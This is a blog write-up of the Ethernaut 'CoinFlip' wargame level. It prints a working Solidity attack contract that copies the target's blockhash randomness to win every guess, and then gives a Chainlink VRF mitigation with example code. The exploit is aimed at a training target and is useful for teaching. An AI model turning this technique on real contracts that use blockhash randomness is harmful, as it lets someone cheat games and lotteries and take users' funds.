# Smart Contract Hacking Ethernaut: 3. CoinFlip

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-26
**URL:** https://paragraph.com/@leekdev/ethernaut-3-coinflip

## Content

Ethernaut is a wargame developed by OpenZeppelin around the Solidity programming language. Every level has a smart contract that needs to be hacked.

### Tutorials

- GitHub - attack code
- Bilibili - video tutorial
- YouTube - video tutorial
- TikTok - ….

### Challenge

A coin-flip guessing game in which you must guess heads or tails correctly 10 times in a row.

### Hack Approach

All of the calculation logic is written in the contract itself, so the logic can simply be copied and used to compute the result.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal interface of the target level contract.
interface ICoinFlipChallenge {
    function flip(bool _guess) external returns (bool);
}

contract CoinFlipAttack {
    // Same constant as the target contract (2^255).
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
    ICoinFlipChallenge public exploitInst;

    constructor(address _target) {
        exploitInst = ICoinFlipChallenge(_target);
    }

    // Copy of the target's calculation. It runs in the same block as the
    // target's flip(), so blockhash(block.number - 1) is the same value.
    function _flip() private view returns (bool) {
        uint256 blockValue = uint256(blockhash(block.number - 1));
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;
        return side;
    }

    // Submit the precomputed guess; revert if it was not accepted.
    function flip() public {
        require(exploitInst.flip(_flip()), "Guess Failed");
    }
}
```

### Hack Cases

…

### Mitigation

Chainlink already has a mature VRF randomness solution that can be used with confidence; you only need to pay a small amount of their token.

### References

- Verifiable source of randomness for smart contracts
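The mitigation described in the post, as an added example that is not from the original post or from Chainlink: a coin flip whose guess is locked in before the randomness exists and whose outcome arrives in a Chainlink VRF v2 callback. The contract name, the inline `IVRFCoordinatorV2` interface (written to match VRF v2's `requestRandomWords` signature), and the confirmation count and callback gas limit are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not Chainlink's code: minimal interface matching the
// VRF v2 coordinator's request function. Production code should inherit
// Chainlink's VRFConsumerBaseV2 rather than hand-rolling the callback check.
interface IVRFCoordinatorV2 {
    function requestRandomWords(
        bytes32 keyHash, uint64 subId, uint16 minimumRequestConfirmations,
        uint32 callbackGasLimit, uint32 numWords
    ) external returns (uint256 requestId);
}

contract VRFCoinFlip {
    struct Bet { address player; bool guess; }

    IVRFCoordinatorV2 private immutable coordinator;
    bytes32 private immutable keyHash; // gas lane, network specific
    uint64 private immutable subId;    // funded VRF subscription id

    mapping(uint256 => Bet) public bets;      // requestId => locked-in guess
    mapping(address => bool) public pending;  // one open bet per player
    mapping(address => uint256) public consecutiveWins;

    constructor(address _coordinator, bytes32 _keyHash, uint64 _subId) {
        coordinator = IVRFCoordinatorV2(_coordinator);
        keyHash = _keyHash;
        subId = _subId;
    }

    // The guess is stored before any randomness exists, so copying this
    // contract's logic into another contract reveals nothing about the result.
    function flip(bool _guess) external returns (uint256 requestId) {
        require(!pending[msg.sender], "bet already pending");
        pending[msg.sender] = true;
        // 3 confirmations and 100000 gas are constructed sample values.
        requestId = coordinator.requestRandomWords(keyHash, subId, 3, 100000, 1);
        bets[requestId] = Bet(msg.sender, _guess);
    }

    // Entry point the VRF coordinator calls with the verified random words.
    function rawFulfillRandomWords(uint256 requestId, uint256[] memory randomWords) external {
        require(msg.sender == address(coordinator), "only coordinator");
        Bet memory bet = bets[requestId];
        delete bets[requestId];
        pending[bet.player] = false;
        bool side = randomWords[0] % 2 == 1;
        consecutiveWins[bet.player] = (side == bet.guess) ? consecutiveWins[bet.player] + 1 : 0;
    }
}
```

The result is settled in a later transaction than the guess, so callers read `consecutiveWins` after the callback instead of receiving a return value from `flip`.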